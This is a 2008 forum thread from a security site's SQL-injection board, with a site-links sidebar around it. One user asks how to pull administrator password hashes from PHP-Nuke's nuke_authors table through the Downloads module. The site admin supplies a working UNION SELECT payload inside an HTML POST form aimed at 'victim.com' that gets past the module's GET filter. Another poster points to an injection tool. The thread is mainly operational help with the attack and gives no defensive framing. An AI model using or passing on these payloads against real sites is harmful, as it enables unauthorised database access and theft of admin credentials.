 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 313
 Members: 0
 Total: 313
|
|
|
|
|
|
Full disclosure |
|
Google Firebase hosting suspension / "malware distribution"bypass
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
PHP-NUKE SQL injection problem ? |
|
 Posted: Sun Apr 20, 2008 5:56 pm |
 |
|
| kr0k0 |
| Advanced user |
 |
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
 |
|
 |
|
Hi waraxe , i need help please for this exploit ,
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+99999999999999,222,33+nuke_authors-- |
9999999999999
but whene i want to read column 'aid' or 'pwd' , does not wotking
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+pwd,222,33+nuke_authors-- |
error Mysql ...
| Code: | | /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=522+union/**/all/**/select+convert(pwd),222,33+nuke_authors-- |
The html tags you attempted to use are not allowed
so ?? waraxe i need help please  |
|
|
|
|
| Posted: Sun Apr 20, 2008 6:48 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You can't use "(" and ")" in phpnuke with GET request method. Use POST method instead  |
|
|
|
|
| Posted: Sun Apr 20, 2008 7:56 pm |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
so how i can Use POST method ? in PHP-NUKe
waraxe plz ..  |
|
|
|
|
| Posted: Sun Apr 20, 2008 8:40 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| kr0k0 wrote: | so how i can Use POST method ? in PHP-NUKe
waraxe plz .. |
You know html?
<form action= "http://victim.com/modules.php?name=Downloads" method="POST">
<input type="hidden" name="d_op" value="viewdownloaddetails">
<input type="hidden" name="lid" value="-1 UNION ALL SELECT UNHEX(HEX(pwd)),2,3 FROM nuke_authors-- ">
<input type="submit" name="axe" "value="Test!">
</form>
Something like that |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 21, 2008 5:11 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| waraxe wrote: | | kr0k0 wrote: | so how i can Use POST method ? in PHP-NUKe
waraxe plz .. |
You know html?
<form action= "http://victim.com/modules.php?name=Downloads" method="POST">
<input type="hidden" name="d_op" value="viewdownloaddetails">
<input type="hidden" name="lid" value="-1 UNION ALL SELECT UNHEX(HEX(pwd)),2,3 FROM nuke_authors-- ">
<input type="submit" name="axe" "value="Test!">
</form>
Something like that |
...or use some program like Hephaestus's Ashen Spear by Wolfman. |
|
|
|
|
| Posted: Tue Apr 22, 2008 11:37 am |
|
|
| kr0k0 |
| Advanced user |
|
|
| Joined: Jan 26, 2008 |
| Posts: 128 |
|
|
|
|
|
|
|
| koko wrote: |
...or use some program like Hephaestus's Ashen Spear by Wolfman. |
THankx waraxe and Koko , but the link of soft , not work ,
if u have the soft , send me plz [ like ] ..
| Code: | http://wolfman.deny.de/tools.html
http://wolfman.deny.de/HAS.php |
|
|
|
|
|
| Posted: Tue Apr 22, 2008 3:11 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
